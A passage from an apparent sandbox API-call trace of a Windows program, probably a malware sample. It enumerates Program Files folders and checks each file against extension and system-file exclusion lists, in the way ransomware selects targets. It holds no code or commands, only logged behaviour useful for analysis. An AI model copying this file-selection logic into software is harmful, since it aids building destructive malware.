hFindFile=0x6989b0, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AS OLEDB", cAlternateFileName="ASOLED~1")) returned 1 [0058.147] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\*.*", lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6999f8 [0058.147] FindNextFileW (in: hFindFile=0x6999f8, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.148] FindNextFileW (in: hFindFile=0x6999f8, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5f1ce1d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f1ce1d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10", cAlternateFileName="")) returned 1 [0058.148] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\*.*", lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5f1ce1d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f1ce1d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69b288 [0058.194] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5f1ce1d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f1ce1d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.195] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5146e3d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5edefe10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5edefe10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cartridges", cAlternateFileName="CARTRI~1")) returned 1 [0058.195] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\*.*", lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5146e3d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5edefe10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5edefe10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6978f0 [0058.225] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5146e3d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5edefe10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5edefe10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.225] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ce7000, ftCreationTime.dwHighDateTime=0x1c9b00b, ftLastAccessTime.dwLowDateTime=0x51494530, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa8ce7000, ftLastWriteTime.dwHighDateTime=0x1c9b00b, nFileSizeHigh=0x0, nFileSizeLow=0x4360, dwReserved0=0x0, dwReserved1=0x0, cFileName="as80.xsl", cAlternateFileName="")) returned 1 [0058.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="XSL", cchCount2=3) returned 1 [0058.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="XSL", cchCount2=3) returned 1 [0058.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="XSL", cchCount2=3) returned 1 [0058.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="XSL", cchCount2=3) returned 1 [0058.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="XSL", cchCount2=3) returned 1 [0058.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="XSL", cchCount2=3) returned 1 [0058.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="XSL", cchCount2=3) returned 1 [0058.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="XSL", cchCount2=3) returned 1 [0058.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="XSL", cchCount2=3) returned 1 [0058.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="XSL", cchCount2=3) returned 1 [0058.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="XSL", cchCount2=3) returned 1 [0058.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="XSL", cchCount2=3) returned 1 [0058.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="XSL", cchCount2=3) returned 1 [0058.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="XSL", cchCount2=3) returned 1 [0058.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="XSL", cchCount2=3) returned 1 [0058.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="XSL", cchCount2=3) returned 1 [0058.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="XSL", cchCount2=3) returned 1 [0058.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="XSL", cchCount2=3) returned 1 [0058.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="AS80.XSL", cchCount2=8) returned 3 [0058.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="AS80.XSL", cchCount2=8) returned 3 [0058.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="AS80.XSL", cchCount2=8) returned 3 [0058.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="AS80.XSL", cchCount2=8) returned 3 [0058.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="AS80.XSL", cchCount2=8) returned 3 [0058.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="AS80.XSL", cchCount2=8) returned 3 [0058.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="AS80.XSL", cchCount2=8) returned 3 [0058.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="AS80.XSL", cchCount2=8) returned 3 [0058.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="AS80.XSL", cchCount2=8) returned 3 [0058.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="AS80.XSL", cchCount2=8) returned 3 [0058.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="AS80.XSL", cchCount2=8) returned 3 [0058.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="AS80.XSL", cchCount2=8) returned 3 [0058.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="AS80.XSL", cchCount2=8) returned 3 [0058.226] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="AS80.XSL", cchCount2=8) returned 3 [0058.226] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ce7000, ftCreationTime.dwHighDateTime=0x1c9b00b, ftLastAccessTime.dwLowDateTime=0x5ed7d9f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa8ce7000, ftLastWriteTime.dwHighDateTime=0x1c9b00b, nFileSizeHigh=0x0, nFileSizeLow=0x4932, dwReserved0=0x0, dwReserved1=0x0, cFileName="as90.xsl", cAlternateFileName="")) returned 1 [0058.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="XSL", cchCount2=3) returned 1 [0058.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="XSL", cchCount2=3) returned 1 [0058.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="XSL", cchCount2=3) returned 1 [0058.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="XSL", cchCount2=3) returned 1 [0058.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="XSL", cchCount2=3) returned 1 [0058.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="XSL", cchCount2=3) returned 1 [0058.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="XSL", cchCount2=3) returned 1 [0058.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="XSL", cchCount2=3) returned 1 [0058.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="XSL", cchCount2=3) returned 1 [0058.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="XSL", cchCount2=3) returned 1 [0058.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="XSL", cchCount2=3) returned 1 [0058.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="XSL", cchCount2=3) returned 1 [0058.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="XSL", cchCount2=3) returned 1 [0058.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="XSL", cchCount2=3) returned 1 [0058.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="XSL", cchCount2=3) returned 1 [0058.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="XSL", cchCount2=3) returned 1 [0058.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="XSL", cchCount2=3) returned 1 [0058.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="XSL", cchCount2=3) returned 1 [0058.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="AS90.XSL", cchCount2=8) returned 3 [0058.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="AS90.XSL", cchCount2=8) returned 3 [0058.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="AS90.XSL", cchCount2=8) returned 3 [0058.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="AS90.XSL", cchCount2=8) returned 3 [0058.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="AS90.XSL", cchCount2=8) returned 3 [0058.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="AS90.XSL", cchCount2=8) returned 3 [0058.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="AS90.XSL", cchCount2=8) returned 3 [0058.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="AS90.XSL", cchCount2=8) returned 3 [0058.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="AS90.XSL", cchCount2=8) returned 3 [0058.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="AS90.XSL", cchCount2=8) returned 3 [0058.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="AS90.XSL", cchCount2=8) returned 3 [0058.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="AS90.XSL", cchCount2=8) returned 3 [0058.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="AS90.XSL", cchCount2=8) returned 3 [0058.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="AS90.XSL", cchCount2=8) returned 3 [0058.228] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa81fdc00, ftCreationTime.dwHighDateTime=0x1c8dd0e, ftLastAccessTime.dwLowDateTime=0x51494530, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa81fdc00, ftLastWriteTime.dwHighDateTime=0x1c8dd0e, nFileSizeHigh=0x0, nFileSizeLow=0x78e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Informix.xsl", cAlternateFileName="")) returned 1 [0058.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="XSL", cchCount2=3) returned 1 [0058.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="XSL", cchCount2=3) returned 1 [0058.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="XSL", cchCount2=3) returned 1 [0058.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="XSL", cchCount2=3) returned 1 [0058.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="XSL", cchCount2=3) returned 1 [0058.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="XSL", cchCount2=3) returned 1 [0058.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="XSL", cchCount2=3) returned 1 [0058.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="XSL", cchCount2=3) returned 1 [0058.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="XSL", cchCount2=3) returned 1 [0058.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="XSL", cchCount2=3) returned 1 [0058.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="XSL", cchCount2=3) returned 1 [0058.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="XSL", cchCount2=3) returned 1 [0058.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="XSL", cchCount2=3) returned 1 [0058.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="XSL", cchCount2=3) returned 1 [0058.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="XSL", cchCount2=3) returned 1 [0058.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="XSL", cchCount2=3) returned 1 [0058.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="XSL", cchCount2=3) returned 1 [0058.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="XSL", cchCount2=3) returned 1 [0058.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="INFORMIX.XSL", cchCount2=12) returned 3 [0058.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="INFORMIX.XSL", cchCount2=12) returned 3 [0058.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="INFORMIX.XSL", cchCount2=12) returned 3 [0058.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="INFORMIX.XSL", cchCount2=12) returned 3 [0058.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="INFORMIX.XSL", cchCount2=12) returned 3 [0058.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="INFORMIX.XSL", cchCount2=12) returned 1 [0058.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="INFORMIX.XSL", cchCount2=12) returned 3 [0058.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="INFORMIX.XSL", cchCount2=12) returned 1 [0058.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="INFORMIX.XSL", cchCount2=12) returned 1 [0058.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="INFORMIX.XSL", cchCount2=12) returned 1 [0058.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="INFORMIX.XSL", cchCount2=12) returned 3 [0058.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="INFORMIX.XSL", cchCount2=12) returned 1 [0058.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="INFORMIX.XSL", cchCount2=12) returned 3 [0058.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="INFORMIX.XSL", cchCount2=12) returned 3 [0058.229] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ce7000, ftCreationTime.dwHighDateTime=0x1c9b00b, ftLastAccessTime.dwLowDateTime=0x51494530, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa8ce7000, ftLastWriteTime.dwHighDateTime=0x1c9b00b, nFileSizeHigh=0x0, nFileSizeLow=0x712e, dwReserved0=0x0, dwReserved1=0x0, cFileName="msjet.xsl", cAlternateFileName="")) returned 1 [0058.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="XSL", cchCount2=3) returned 1 [0058.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="XSL", cchCount2=3) returned 1 [0058.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="XSL", cchCount2=3) returned 1 [0058.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="XSL", cchCount2=3) returned 1 [0058.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="XSL", cchCount2=3) returned 1 [0058.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="XSL", cchCount2=3) returned 1 [0058.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="XSL", cchCount2=3) returned 1 [0058.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="XSL", cchCount2=3) returned 1 [0058.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="XSL", cchCount2=3) returned 1 [0058.230] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ce7000, ftCreationTime.dwHighDateTime=0x1c9b00b, ftLastAccessTime.dwLowDateTime=0x51552c10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa8ce7000, ftLastWriteTime.dwHighDateTime=0x1c9b00b, nFileSizeHigh=0x0, nFileSizeLow=0x851c, dwReserved0=0x0, dwReserved1=0x0, cFileName="sql2000.xsl", cAlternateFileName="")) returned 1 [0058.230] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ce7000, ftCreationTime.dwHighDateTime=0x1c9b00b, ftLastAccessTime.dwLowDateTime=0x5edefe10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa8ce7000, ftLastWriteTime.dwHighDateTime=0x1c9b00b, nFileSizeHigh=0x0, nFileSizeLow=0x7d92, dwReserved0=0x0, dwReserved1=0x0, cFileName="sql70.xsl", cAlternateFileName="")) returned 1 [0058.230] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ce7000, ftCreationTime.dwHighDateTime=0x1c9b00b, ftLastAccessTime.dwLowDateTime=0x51552c10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa8ce7000, ftLastWriteTime.dwHighDateTime=0x1c9b00b, nFileSizeHigh=0x0, nFileSizeLow=0x9a5b, dwReserved0=0x0, dwReserved1=0x0, cFileName="sql90.xsl", cAlternateFileName="")) returned 1 [0058.230] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa81fdc00, ftCreationTime.dwHighDateTime=0x1c8dd0e, ftLastAccessTime.dwLowDateTime=0x5edefe10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa81fdc00, ftLastWriteTime.dwHighDateTime=0x1c8dd0e, nFileSizeHigh=0x0, nFileSizeLow=0x745e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sybase.xsl", cAlternateFileName="")) returned 1 [0058.230] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa81fdc00, ftCreationTime.dwHighDateTime=0x1c8dd0e, ftLastAccessTime.dwLowDateTime=0x5edefe10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa81fdc00, ftLastWriteTime.dwHighDateTime=0x1c8dd0e, nFileSizeHigh=0x0, nFileSizeLow=0x745e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sybase.xsl", cAlternateFileName="")) returned 0 [0058.230] FindClose (in: hFindFile=0x6978f0 | out: hFindFile=0x6978f0) returned 1 [0058.231] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3cf6c00, ftCreationTime.dwHighDateTime=0x1ca2caa, ftLastAccessTime.dwLowDateTime=0x5f005150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf3cf6c00, ftLastWriteTime.dwHighDateTime=0x1ca2caa, nFileSizeHigh=0x0, nFileSizeLow=0x2a65d68, dwReserved0=0x0, dwReserved1=0x0, cFileName="msmdlocal.dll", cAlternateFileName="MSMDLO~1.DLL")) returned 1 [0058.231] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47fe200, ftCreationTime.dwHighDateTime=0x1ca2cab, ftLastAccessTime.dwLowDateTime=0x51552c10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x47fe200, ftLastWriteTime.dwHighDateTime=0x1ca2cab, nFileSizeHigh=0x0, nFileSizeLow=0xbc4568, dwReserved0=0x0, dwReserved1=0x0, cFileName="msmgdsrv.dll", cAlternateFileName="")) returned 1 [0058.231] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b10f00, ftCreationTime.dwHighDateTime=0x1ca2cab, ftLastAccessTime.dwLowDateTime=0x5f28c8b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5b10f00, ftLastWriteTime.dwHighDateTime=0x1ca2cab, nFileSizeHigh=0x0, nFileSizeLow=0x7c6f68, dwReserved0=0x0, 